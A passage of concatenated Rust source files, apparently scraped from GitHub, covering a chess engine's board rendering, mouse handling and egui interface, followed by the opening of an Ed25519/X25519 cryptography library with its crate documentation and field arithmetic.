resvg::render(&tree, fit, transform, pixmap.as_mut());
}
}
}
if let Some(m) = self.user_move {
if m.is_empty_prom() {
let transform =
tiny_skia::Transform::from_translate(self.overlay_xywh.0, self.overlay_xywh.1);
self.draw_prom_choice(config.get_active_color(), transform, &mut pixmap);
}
}
// Draw the picked piece if any
if let Some(sq) = self.picked_piece {
let p = config.get_at_sq(sq).unwrap();
let tree = self.get_glyph_tree(&p);
let pos = self.mouse_state.get_pos();
let y = pos.1;
let x = pos.0;
let transform = tiny_skia::Transform::from_translate(
x as f32 - glyph_width as f32 / 2.0,
y as f32 - glyph_width as f32 / 2.0,
);
let fit = usvg::FitTo::Width(glyph_width);
resvg::render(&tree, fit, transform, pixmap.as_mut());
}
if let GameState::Mate(mate) = config.get_state() {
let transform =
tiny_skia::Transform::from_translate(self.overlay_xywh.0, self.overlay_xywh.1);
self.draw_text(
&format!("Check Mate: {}", mate),
32.0,
transform,
&mut pixmap,
)
} else if config.get_state() == GameState::StaleMate {
let transform =
tiny_skia::Transform::from_translate(self.overlay_xywh.0, self.overlay_xywh.1);
self.draw_text(&format!("It's a Stalemate"), 32.0, transform, &mut pixmap)
}
frame.copy_from_slice(pixmap.data());
}
pub fn get_draw_area_side(&self) -> u32 {
self.side_length + self.ruler_offset
}
fn get_check_side(&self) -> f32 {
(self.side_length / 8) as f32
}
fn get_glyph_tree(&mut self, p: &BoardPiece) -> usvg::Tree {
let glyph_path = Board::get_glyph_path(p);
match self.glyph_cache.get(&glyph_path) {
Some(t) => t,
None => {
log::info!("Importing glyph {}", glyph_path);
let str = Board::get_svg_src(&glyph_path);
let t = usvg::Tree::from_str(&str, &usvg::Options::default()).unwrap_or_else(|e| {
log::error!("usvg::Tree::from_str: {}", e);
panic!();
});
self.glyph_cache.put(&glyph_path, &t);
t
}
}
}
fn get_glyph_path(p: &BoardPiece) -> String {
let s = format!("{}.svg", p);
s.to_owned()
}
fn update_mouse_state(&mut self, e: BoardEvent) {
match e {
BoardEvent::MouseInput { button, state } => match button {
MouseButton::Left => match state {
ElementState::Pressed => self.mouse_state.set_left_pressed(),
ElementState::Released => self.mouse_state.set_left_released(),
},
MouseButton::Right => match state {
ElementState::Pressed => self.mouse_state.set_right_pressed(),
ElementState::Released => self.mouse_state.set_right_released(),
},
_ => {}
},
BoardEvent::CursorMoved { position } => {
self.mouse_state.set_cursor_in();
// if position.0 as u32 > self.ruler_offset && (position.1 as u32) < self.side_length {
let position = (position.0, position.1);
self.mouse_state.update_pos(position);
// }
}
BoardEvent::CursorLeft => {
self.mouse_state.unset_cursor_in();
}
}
}
fn get_sq_from_pointer(&self) -> Square {
let pos = self.mouse_state.get_pos();
let check_side = self.get_check_side() as usize;
let off = self.ruler_offset as usize;
let x = (pos.0.clamp(off, off + self.side_length as usize - 1) - off) / check_side as usize;
let y = 7 - (pos.1.clamp(0, self.side_length as usize - 1) / check_side as usize);
(x, y).try_into().unwrap()
}
fn get_font_src() -> Vec<u8> {
let filename = "Roboto-Bold.ttf";
let content = EmbeddedFonts::get(filename).expect(&format!("{} not found", filename));
content.data.as_ref().to_vec()
}
fn get_svg_src(filename: &str) -> String {
let content = SvgSprites::get(filename).expect(&format!("{} not found", filename));
let content = std::str::from_utf8(content.data.as_ref()).unwrap();
content.to_string()
}
fn draw_prom_choice(
&mut self,
color: Color,
t: tiny_skia::Transform,
pixmap: &mut tiny_skia::Pixmap,
) {
let check_side = self.get_check_side();
let mut pm =
tiny_skia::Pixmap::new(self.overlay_xywh.2 as u32, self.overlay_xywh.3 as u32).unwrap();
let glyph_width = (check_side * 0.75) as u32;
let pieces = match color {
Color::White => W_PROM_OPTS,
Color::Black => B_PROM_OPTS,
};
pm.fill(tiny_skia::Color::WHITE);
for (i, p) in pieces.iter().enumerate() {
let tree = self.get_glyph_tree(&p);
let glyph_t = tiny_skia::Transform::from_translate(
i as f32 * check_side + glyph_width as f32 / 8.0,
glyph_width as f32 / 8.0,
);
let fit = usvg::FitTo::Width(glyph_width);
resvg::render(&tree, fit, glyph_t, pm.as_mut());
}
pixmap.draw_pixmap(
0,
0,
pm.as_ref(),
&tiny_skia::PixmapPaint::default(),
t,
None,
);
}
fn draw_text(
&mut self,
s: &str,
px: f32,
t: tiny_skia::Transform,
pixmap: &mut tiny_skia::Pixmap,
) {
let mut pm =
tiny_skia::Pixmap::new(self.overlay_xywh.2 as u32, self.overlay_xywh.3 as u32).unwrap();
// pm.fill(tiny_skia::Color::WHITE);
let mut layout = Layout::new(CoordinateSystem::PositiveYDown);
layout.reset(&LayoutSettings {
x: 0.0,
y: 0.0,
max_width: Some(self.overlay_xywh.2),
max_height: Some(self.overlay_xywh.3),
horizontal_align: HorizontalAlign::Center,
..LayoutSettings::default()
});
layout.append(&[&self.font], &TextStyle::new(s, px, 0));
for glyph in layout.glyphs() {
let (_, bitmap) = self.font.rasterize_indexed(glyph.key.glyph_index, px);
let mut bitmap: Vec<u8> = bitmap
.into_iter()
.map(|x| vec![0, 0, 0, x])
.flatten()
.collect();
if glyph.char_data.is_whitespace() {
continue;
}
let x = tiny_skia::PixmapMut::from_bytes(
&mut bitmap,
glyph.width as u32,
glyph.height as u32,
)
.unwrap()
.to_owned();
pm.draw_pixmap(
glyph.x as i32,
glyph.y as i32,
x.as_ref(),
&tiny_skia::PixmapPaint::default(),
tiny_skia::Transform::identity(),
None,
);
}
pixmap.draw_pixmap(
0,
0,
pm.as_ref(),
&tiny_skia::PixmapPaint::default(),
t,
None,
);
}
fn draw_char(
&mut self,
c: char,
px: f32,
t: tiny_skia::Transform,
pixmap: &mut tiny_skia::Pixmap,
) {
let pm = {
match self.raster_cache.get(&c.to_string()) {
Some(x) => x,
None => {
log::info!("Rasterizing {}", c);
let (metrics, bitmap) = self.font.rasterize(c, px);
let mut p: Vec<u8> = bitmap
.into_iter()
.map(|x| vec![x, x, x, x])
.flatten()
.collect();
let x = tiny_skia::PixmapMut::from_bytes(
&mut p,
metrics.width as u32,
metrics.height as u32,
)
.unwrap()
.to_owned();
self.raster_cache.put(&c.to_string(), &x);
x
}
}
};
pixmap.draw_pixmap(
0,
0,
pm.as_ref(),
&tiny_skia::PixmapPaint::default(),
t,
None,
);
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/board/events.rs | chrs/src/board/events.rs | pub use winit::event::{ElementState, MouseButton};
pub enum BoardEvent {
CursorMoved {
position: (usize, usize),
},
MouseInput {
state: ElementState,
button: MouseButton,
},
CursorLeft,
}
#[derive(Debug, Default)]
pub struct MouseState {
is_left_pressed: bool,
is_right_pressed: bool,
is_cursor_in: bool,
pos: (usize, usize),
delta: (i16, i16),
}
impl MouseState {
pub fn update_pos(&mut self, p: (usize, usize)) {
self.delta = (
p.0 as i16 - self.pos.0 as i16,
p.1 as i16 - self.pos.1 as i16,
);
self.pos = p;
}
pub fn get_is_left_pressed(&self) -> bool {
self.is_left_pressed
}
pub fn get_is_right_pressed(&self) -> bool {
self.is_right_pressed
}
pub fn get_is_cursor_in(&self) -> bool {
self.is_cursor_in
}
pub fn get_pos(&self) -> (usize, usize) {
self.pos
}
pub fn get_delta(&self) -> (i16, i16) {
self.delta
}
pub fn set_left_pressed(&mut self) {
self.is_left_pressed = true;
}
pub fn set_left_released(&mut self) {
self.is_left_pressed = false;
}
pub fn set_right_pressed(&mut self) {
self.is_right_pressed = true;
}
pub fn set_right_released(&mut self) {
self.is_right_pressed = false;
}
pub fn unset_cursor_in(&mut self) {
self.is_cursor_in = false;
}
pub fn set_cursor_in(&mut self) {
self.is_cursor_in = true;
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/ui/gui.rs | chrs/src/ui/gui.rs | use std::cell::RefCell;
use std::rc::Rc;
use chrs_lib::ai::NegaMaxAI;
use chrs_lib::data::BoardConfig;
use chrs_lib::data::Color;
use egui::Slider;
use egui::{Color32, Context};
pub struct Gui {
fen: String,
bit_board: String,
show_menu: bool,
show_about: bool,
}
impl Gui {
/// Create a `Gui`.
pub fn new() -> Self {
Self {
fen: "".to_string(),
bit_board: "p".to_string(),
show_menu: true,
show_about: false,
}
}
/// Create the UI using egui.
pub fn ui(&mut self, ctx: &Context, config: &mut BoardConfig, ai: &mut NegaMaxAI) {
egui::TopBottomPanel::top("top_panel").show(ctx, |ui| {
ui.visuals_mut().button_frame = false;
ui.horizontal(|ui| {
egui::widgets::global_dark_light_mode_switch(ui);
ui.separator();
ui.toggle_value(&mut self.show_menu, "☰ Menu");
ui.separator();
ui.toggle_value(&mut self.show_about, "ℹ About");
});
});
egui::TopBottomPanel::bottom("bottom_panel").show(ctx, |ui| {
ui.visuals_mut().button_frame = false;
ui.horizontal(|ui| {
if config.move_history.counter > 0 {
ui.label("Recent Moves: ");
let end = config.move_history.counter;
let start = end.saturating_sub(5);
let mut alpha = 0xff;
for i in (start..end).rev() {
let color = ui.style().visuals.text_color();
ui.label(
egui::RichText::new(format!(
"{}",
config.move_history.list[i as usize].unwrap()
))
.color(
egui::Color32::from_rgba_unmultiplied(
color.r(),
color.g(),
color.b(),
alpha,
),
),
);
alpha = alpha.saturating_sub(50);
if i != start {
ui.separator();
}
}
} else {
ui.label("No moves yet");
}
});
});
egui::Window::new("ℹ About")
.open(&mut self.show_about)
.show(ctx, |ui| {
ui.vertical_centered_justified(|ui| {
ui.strong("chess-rs");
ui.strong(format!("v{}", env!("CARGO_PKG_VERSION")));
ui.label("A Chess Engine written in Rust that runs natively and on the web!");
ui.strong("⚖ MIT license");
ui.strong("Author: Parth Pant");
ui.strong("Email: parthpant4@gmail.com");
use egui::special_emojis::{GITHUB, TWITTER};
ui.hyperlink_to(
format!("{} chess-rs on GitHub", GITHUB),
"https://github.com/ParthPant/chess-rs",
);
ui.hyperlink_to(
format!("{} @PantParth", TWITTER),
"https://twitter.com/PantParth",
);
});
});
egui::SidePanel::left("left_Panel")
.frame(egui::Frame::central_panel(&ctx.style()).inner_margin(5.))
.show_animated(ctx, self.show_menu, |ui| {
ui.strong("chess-rs");
ui.heading("In Play");
ui.label({
match config.get_active_color() {
Color::White => "White",
Color::Black => "Black",
}
});
ui.separator();
ui.horizontal(|ui| {
if ui.button("Reset").clicked() {
config.reset();
}
if ui.button("Undo").clicked() {
config.undo();
config.undo();
}
});
ui.separator();
ui.heading("Board Configuration");
egui::CollapsingHeader::new("FEN").show(ui, |ui| {
ui.label(egui::RichText::new(config.get_fen()).size(10.0).monospace());
if ui
.add(egui::Label::new("📋").sense(egui::Sense::click()))
.clicked()
{
ui.output_mut(|o| o.copied_text = config.get_fen());
}
ui.add(egui::TextEdit::multiline(&mut self.fen));
if ui.button("Load Fen").clicked() {
config.load_fen(&self.fen);
}
});
ui.separator();
ui.heading("AI");
ui.add(Slider::new(&mut ai.depth, 2..=8).text("Search Depth"));
ui.add(Slider::new(&mut ai.quiescence_depth, 2..=8).text("Quiescence Depth"));
ui.separator();
ui.label(format!("Nodes Searched: {}", ai.stats.node_count));
ui.label(format!("Max Depth: {}", ai.stats.max_depth));
ui.label(format!("Time Taken: {:?}", ai.stats.time));
});
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/ui/mod.rs | chrs/src/ui/mod.rs | /* Shamelessly Copied from examples/minimal-egui in `Pixels` repo!
* Link: https://github.com/parasyte/pixels/blob/main/examples/minimal-egui/src/gui.rs
*/
mod gui;
use chrs_lib::ai::NegaMaxAI;
use chrs_lib::data::BoardConfig;
use egui::{ClippedPrimitive, Context, TexturesDelta};
use egui_wgpu::renderer::{Renderer, ScreenDescriptor};
use gui::Gui;
use pixels::{wgpu, PixelsContext};
use std::cell::RefCell;
use std::rc::Rc;
use winit::event_loop::EventLoopWindowTarget;
use winit::window::Window;
/// Manages all state required for rendering egui over `Pixels`.
pub struct GuiFramework {
// State for egui.
egui_ctx: Context,
egui_state: egui_winit::State,
screen_descriptor: ScreenDescriptor,
renderer: Renderer,
paint_jobs: Vec<ClippedPrimitive>,
textures: TexturesDelta,
// State for the GUI
gui: Gui,
}
impl GuiFramework {
/// Create egui.
pub fn new<T>(
event_loop: &EventLoopWindowTarget<T>,
width: u32,
height: u32,
scale_factor: f32,
pixels: &pixels::Pixels,
) -> Self {
let max_texture_size = pixels.device().limits().max_texture_dimension_2d as usize;
let egui_ctx = Context::default();
let mut egui_state = egui_winit::State::new(event_loop);
egui_state.set_max_texture_side(max_texture_size);
egui_state.set_pixels_per_point(scale_factor);
let screen_descriptor = ScreenDescriptor {
size_in_pixels: [width, height],
pixels_per_point: scale_factor,
};
let device = pixels.device();
let tex_format = pixels.render_texture_format();
let renderer = Renderer::new(device, tex_format, None, 1);
let textures = TexturesDelta::default();
let gui = Gui::new();
Self {
egui_ctx,
egui_state,
screen_descriptor,
renderer,
paint_jobs: Vec::new(),
textures,
gui,
}
}
/// Handle input events from the window manager.
pub fn handle_event(&mut self, event: &winit::event::WindowEvent) -> bool {
self.egui_state.on_event(&self.egui_ctx, event).consumed
}
/// Resize egui.
pub fn resize(&mut self, width: u32, height: u32) {
if width > 0 && height > 0 {
self.screen_descriptor.size_in_pixels = [width, height];
}
}
/// Update scaling factor.
pub fn scale_factor(&mut self, scale_factor: f64) {
self.screen_descriptor.pixels_per_point = scale_factor as f32;
}
/// Prepare egui.
pub fn prepare(&mut self, window: &Window, config: &mut BoardConfig, ai: &mut NegaMaxAI) {
// Run the egui frame and create all paint jobs to prepare for rendering.
let raw_input = self.egui_state.take_egui_input(window);
let output = self.egui_ctx.run(raw_input, |egui_ctx| {
// Draw the demo application.
self.gui.ui(egui_ctx, config, ai);
});
self.textures.append(output.textures_delta);
self.egui_state
.handle_platform_output(window, &self.egui_ctx, output.platform_output);
self.paint_jobs = self.egui_ctx.tessellate(output.shapes);
}
/// Render egui.
pub fn render(
&mut self,
encoder: &mut wgpu::CommandEncoder,
render_target: &wgpu::TextureView,
context: &PixelsContext,
) {
// Upload all resources to the GPU.
for (id, image_delta) in &self.textures.set {
self.renderer
.update_texture(&context.device, &context.queue, *id, image_delta);
}
self.renderer.update_buffers(
&context.device,
&context.queue,
encoder,
&self.paint_jobs,
&self.screen_descriptor,
);
// Render egui with WGPU
{
let mut rpass = encoder.begin_render_pass(&wgpu::RenderPassDescriptor {
label: Some("egui"),
color_attachments: &[Some(wgpu::RenderPassColorAttachment {
view: render_target,
resolve_target: None,
ops: wgpu::Operations {
load: wgpu::LoadOp::Load,
store: true,
},
})],
depth_stencil_attachment: None,
});
self.renderer
.render(&mut rpass, &self.paint_jobs, &self.screen_descriptor);
}
// Cleanup
let textures = std::mem::take(&mut self.textures);
for id in &textures.free {
self.renderer.free_texture(id);
}
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/lib.rs | src/lib.rs | //! A compact Ed25519 and X25519 implementation for Rust.
//!
//! * Formally-verified Curve25519 field arithmetic
//! * `no_std`-friendly
//! * WebAssembly-friendly
//! * Fastly Compute-friendly
//! * Lightweight
//! * Zero dependencies if randomness is provided by the application
//! * Only one portable dependency (`getrandom`) if not
//! * Supports incremental signatures (streaming API)
//! * Safe and simple Rust interface.
//!
//! Example usage:
//!
//! ```rust
//! # #[cfg(feature = "random")] {
//! use ed25519_compact::*;
//!
//! // A message to sign and verify.
//! let message = b"test";
//!
//! // Generates a new key pair using a random seed.
//! // A given seed will always produce the same key pair.
//! let key_pair = KeyPair::from_seed(Seed::generate());
//!
//! // Computes a signature for this message using the secret part of the key pair.
//! let signature = key_pair.sk.sign(message, Some(Noise::generate()));
//!
//! // Verifies the signature using the public part of the key pair.
//! key_pair
//! .pk
//! .verify(message, &signature)
//! .expect("Signature didn't verify");
//!
//! // Verification of a different message using the same signature and public key fails.
//! key_pair
//! .pk
//! .verify(b"A different message", &signature)
//! .expect_err("Signature shouldn't verify");
//!
//! // All these structures can be viewed as raw bytes simply by dereferencing them:
//! let signature_as_bytes: &[u8] = signature.as_ref();
//! println!("Signature as bytes: {:?}", signature_as_bytes);
//! # }
//! ```
//!
//! ## Incremental API example usage
//!
//! Messages can also be supplied as multiple parts (streaming API) in order to
//! handle large messages without using much memory:
//!
//! ```rust
//! # #[cfg(feature = "random")] {
//! use ed25519_compact::*;
//!
//! /// Creates a new key pair.
//! let kp = KeyPair::generate();
//!
//! /// Create a state for an incremental signer.
//! let mut st = kp.sk.sign_incremental(Noise::default());
//!
//! /// Feed the message as any number of chunks, and sign the concatenation.
//! st.absorb("mes");
//! st.absorb("sage");
//! let signature = st.sign();
//!
//! /// Create a state for an incremental verifier.
//! let mut st = kp.pk.verify_incremental(&signature).unwrap();
//!
//! /// Feed the message as any number of chunks, and verify the concatenation.
//! st.absorb("mess");
//! st.absorb("age");
//! assert!(st.verify().is_ok());
//! # }
//! ```
//!
//! Cargo features:
//!
//! * `self-verify`: after having computed a new signature, verify that is it
//! valid. This is slower, but improves resilience against fault attacks. It
//! is enabled by default on WebAssembly targets.
//! * `std`: disables `no_std` compatibility in order to make errors implement
//! the standard `Error` trait.
//! * `random` (enabled by default): adds `Default` and `generate`
//! implementations to the `Seed` and `Noise` objects, in order to securely
//! create random keys and noise.
//! * `traits`: add support for the traits from the ed25519 and signature
//! crates.
//! * `pem`: add support for importing/exporting keys as OpenSSL-compatible PEM
//! files.
//! * `blind-keys`: add support for key blinding.
//! * `opt_size`: Enable size optimizations (based on benchmarks, 8-15% size
//! reduction at the cost of 6.5-7% performance).
//! * `x25519`: Enable support for the X25519 key exchange system.
//! * `disable-signatures`: Disable support for signatures, and only compile
//! support for X25519.
#![cfg_attr(not(feature = "std"), no_std)]
#![allow(
clippy::needless_range_loop,
clippy::many_single_char_names,
clippy::unreadable_literal,
clippy::let_and_return,
clippy::needless_lifetimes,
clippy::cast_lossless,
clippy::suspicious_arithmetic_impl,
clippy::identity_op
)]
mod common;
mod error;
mod field25519;
mod sha512;
pub use crate::common::*;
pub use crate::error::*;
#[cfg(not(feature = "disable-signatures"))]
mod ed25519;
#[cfg(not(feature = "disable-signatures"))]
mod edwards25519;
#[cfg(not(feature = "disable-signatures"))]
pub use crate::ed25519::*;
#[cfg(feature = "x25519")]
pub mod x25519;
#[cfg(not(feature = "disable-signatures"))]
#[cfg(feature = "pem")]
mod pem;
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/field25519.rs | src/field25519.rs | #![allow(unused_parens)]
#![allow(non_camel_case_types)]
use core::cmp::{Eq, PartialEq};
use core::ops::{Add, Mul, Sub};
use crate::error::*;
pub type fiat_25519_u1 = u8;
pub type fiat_25519_i1 = i8;
pub type fiat_25519_i2 = i8;
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_addcarryx_u51(
out1: &mut u64,
out2: &mut fiat_25519_u1,
arg1: fiat_25519_u1,
arg2: u64,
arg3: u64,
) {
let x1: u64 = (((arg1 as u64).wrapping_add(arg2)).wrapping_add(arg3));
let x2: u64 = (x1 & 0x7ffffffffffff);
let x3: fiat_25519_u1 = ((x1 >> 51) as fiat_25519_u1);
*out1 = x2;
*out2 = x3;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_subborrowx_u51(
out1: &mut u64,
out2: &mut fiat_25519_u1,
arg1: fiat_25519_u1,
arg2: u64,
arg3: u64,
) {
let x1: i64 = ((((((arg2 as i128).wrapping_sub((arg1 as i128))) as i64) as i128)
.wrapping_sub((arg3 as i128))) as i64);
let x2: fiat_25519_i1 = ((x1 >> 51) as fiat_25519_i1);
let x3: u64 = (((x1 as i128) & 0x7ffffffffffff_i128) as u64);
*out1 = x3;
*out2 = ((0x0_i8.wrapping_sub((x2 as fiat_25519_i2))) as fiat_25519_u1);
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_cmovznz_u64(out1: &mut u64, arg1: fiat_25519_u1, arg2: u64, arg3: u64) {
let x1: fiat_25519_u1 = (!(!arg1));
let x2: u64 = (((((0x0_i8.wrapping_sub((x1 as fiat_25519_i2))) as fiat_25519_i1) as i128)
& 0xffffffffffffffff_i128) as u64);
let x3: u64 = ((x2 & arg3) | ((!x2) & arg2));
*out1 = x3;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_carry_mul(out1: &mut [u64; 5], arg1: &[u64; 5], arg2: &[u64; 5]) {
let x1: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
let x2: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[3]).wrapping_mul(0x13)) as u128)));
let x3: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[2]).wrapping_mul(0x13)) as u128)));
let x4: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[1]).wrapping_mul(0x13)) as u128)));
let x5: u128 = (((arg1[3]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
let x6: u128 = (((arg1[3]) as u128).wrapping_mul((((arg2[3]).wrapping_mul(0x13)) as u128)));
let x7: u128 = (((arg1[3]) as u128).wrapping_mul((((arg2[2]).wrapping_mul(0x13)) as u128)));
let x8: u128 = (((arg1[2]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
let x9: u128 = (((arg1[2]) as u128).wrapping_mul((((arg2[3]).wrapping_mul(0x13)) as u128)));
let x10: u128 = (((arg1[1]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
let x11: u128 = (((arg1[4]) as u128).wrapping_mul(((arg2[0]) as u128)));
let x12: u128 = (((arg1[3]) as u128).wrapping_mul(((arg2[1]) as u128)));
let x13: u128 = (((arg1[3]) as u128).wrapping_mul(((arg2[0]) as u128)));
let x14: u128 = (((arg1[2]) as u128).wrapping_mul(((arg2[2]) as u128)));
let x15: u128 = (((arg1[2]) as u128).wrapping_mul(((arg2[1]) as u128)));
let x16: u128 = (((arg1[2]) as u128).wrapping_mul(((arg2[0]) as u128)));
let x17: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[3]) as u128)));
let x18: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[2]) as u128)));
let x19: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[1]) as u128)));
let x20: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[0]) as u128)));
let x21: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[4]) as u128)));
let x22: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[3]) as u128)));
let x23: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[2]) as u128)));
let x24: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[1]) as u128)));
let x25: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[0]) as u128)));
let x26: u128 =
(x25.wrapping_add((x10.wrapping_add((x9.wrapping_add((x7.wrapping_add(x4))))))));
let x27: u64 = ((x26 >> 51) as u64);
let x28: u64 = ((x26 & 0x7ffffffffffff_u128) as u64);
let x29: u128 =
(x21.wrapping_add((x17.wrapping_add((x14.wrapping_add((x12.wrapping_add(x11))))))));
let x30: u128 =
(x22.wrapping_add((x18.wrapping_add((x15.wrapping_add((x13.wrapping_add(x1))))))));
let x31: u128 =
(x23.wrapping_add((x19.wrapping_add((x16.wrapping_add((x5.wrapping_add(x2))))))));
let x32: u128 =
(x24.wrapping_add((x20.wrapping_add((x8.wrapping_add((x6.wrapping_add(x3))))))));
let x33: u128 = ((x27 as u128).wrapping_add(x32));
let x34: u64 = ((x33 >> 51) as u64);
let x35: u64 = ((x33 & 0x7ffffffffffff_u128) as u64);
let x36: u128 = ((x34 as u128).wrapping_add(x31));
let x37: u64 = ((x36 >> 51) as u64);
let x38: u64 = ((x36 & 0x7ffffffffffff_u128) as u64);
let x39: u128 = ((x37 as u128).wrapping_add(x30));
let x40: u64 = ((x39 >> 51) as u64);
let x41: u64 = ((x39 & 0x7ffffffffffff_u128) as u64);
let x42: u128 = ((x40 as u128).wrapping_add(x29));
let x43: u64 = ((x42 >> 51) as u64);
let x44: u64 = ((x42 & 0x7ffffffffffff_u128) as u64);
let x45: u64 = (x43.wrapping_mul(0x13));
let x46: u64 = (x28.wrapping_add(x45));
let x47: u64 = (x46 >> 51);
let x48: u64 = (x46 & 0x7ffffffffffff);
let x49: u64 = (x47.wrapping_add(x35));
let x50: fiat_25519_u1 = ((x49 >> 51) as fiat_25519_u1);
let x51: u64 = (x49 & 0x7ffffffffffff);
let x52: u64 = ((x50 as u64).wrapping_add(x38));
out1[0] = x48;
out1[1] = x51;
out1[2] = x52;
out1[3] = x41;
out1[4] = x44;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_carry_square(out1: &mut [u64; 5], arg1: &[u64; 5]) {
let x1: u64 = ((arg1[4]).wrapping_mul(0x13));
let x2: u64 = (x1.wrapping_mul(0x2));
let x3: u64 = ((arg1[4]).wrapping_mul(0x2));
let x4: u64 = ((arg1[3]).wrapping_mul(0x13));
let x5: u64 = (x4.wrapping_mul(0x2));
let x6: u64 = ((arg1[3]).wrapping_mul(0x2));
let x7: u64 = ((arg1[2]).wrapping_mul(0x2));
let x8: u64 = ((arg1[1]).wrapping_mul(0x2));
let x9: u128 = (((arg1[4]) as u128).wrapping_mul((x1 as u128)));
let x10: u128 = (((arg1[3]) as u128).wrapping_mul((x2 as u128)));
let x11: u128 = (((arg1[3]) as u128).wrapping_mul((x4 as u128)));
let x12: u128 = (((arg1[2]) as u128).wrapping_mul((x2 as u128)));
let x13: u128 = (((arg1[2]) as u128).wrapping_mul((x5 as u128)));
let x14: u128 = (((arg1[2]) as u128).wrapping_mul(((arg1[2]) as u128)));
let x15: u128 = (((arg1[1]) as u128).wrapping_mul((x2 as u128)));
let x16: u128 = (((arg1[1]) as u128).wrapping_mul((x6 as u128)));
let x17: u128 = (((arg1[1]) as u128).wrapping_mul((x7 as u128)));
let x18: u128 = (((arg1[1]) as u128).wrapping_mul(((arg1[1]) as u128)));
let x19: u128 = (((arg1[0]) as u128).wrapping_mul((x3 as u128)));
let x20: u128 = (((arg1[0]) as u128).wrapping_mul((x6 as u128)));
let x21: u128 = (((arg1[0]) as u128).wrapping_mul((x7 as u128)));
let x22: u128 = (((arg1[0]) as u128).wrapping_mul((x8 as u128)));
let x23: u128 = (((arg1[0]) as u128).wrapping_mul(((arg1[0]) as u128)));
let x24: u128 = (x23.wrapping_add((x15.wrapping_add(x13))));
let x25: u64 = ((x24 >> 51) as u64);
let x26: u64 = ((x24 & 0x7ffffffffffff_u128) as u64);
let x27: u128 = (x19.wrapping_add((x16.wrapping_add(x14))));
let x28: u128 = (x20.wrapping_add((x17.wrapping_add(x9))));
let x29: u128 = (x21.wrapping_add((x18.wrapping_add(x10))));
let x30: u128 = (x22.wrapping_add((x12.wrapping_add(x11))));
let x31: u128 = ((x25 as u128).wrapping_add(x30));
let x32: u64 = ((x31 >> 51) as u64);
let x33: u64 = ((x31 & 0x7ffffffffffff_u128) as u64);
let x34: u128 = ((x32 as u128).wrapping_add(x29));
let x35: u64 = ((x34 >> 51) as u64);
let x36: u64 = ((x34 & 0x7ffffffffffff_u128) as u64);
let x37: u128 = ((x35 as u128).wrapping_add(x28));
let x38: u64 = ((x37 >> 51) as u64);
let x39: u64 = ((x37 & 0x7ffffffffffff_u128) as u64);
let x40: u128 = ((x38 as u128).wrapping_add(x27));
let x41: u64 = ((x40 >> 51) as u64);
let x42: u64 = ((x40 & 0x7ffffffffffff_u128) as u64);
let x43: u64 = (x41.wrapping_mul(0x13));
let x44: u64 = (x26.wrapping_add(x43));
let x45: u64 = (x44 >> 51);
let x46: u64 = (x44 & 0x7ffffffffffff);
let x47: u64 = (x45.wrapping_add(x33));
let x48: fiat_25519_u1 = ((x47 >> 51) as fiat_25519_u1);
let x49: u64 = (x47 & 0x7ffffffffffff);
let x50: u64 = ((x48 as u64).wrapping_add(x36));
out1[0] = x46;
out1[1] = x49;
out1[2] = x50;
out1[3] = x39;
out1[4] = x42;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_carry(out1: &mut [u64; 5], arg1: &[u64; 5]) {
let x1: u64 = (arg1[0]);
let x2: u64 = ((x1 >> 51).wrapping_add((arg1[1])));
let x3: u64 = ((x2 >> 51).wrapping_add((arg1[2])));
let x4: u64 = ((x3 >> 51).wrapping_add((arg1[3])));
let x5: u64 = ((x4 >> 51).wrapping_add((arg1[4])));
let x6: u64 = ((x1 & 0x7ffffffffffff).wrapping_add(((x5 >> 51).wrapping_mul(0x13))));
let x7: u64 = ((((x6 >> 51) as fiat_25519_u1) as u64).wrapping_add((x2 & 0x7ffffffffffff)));
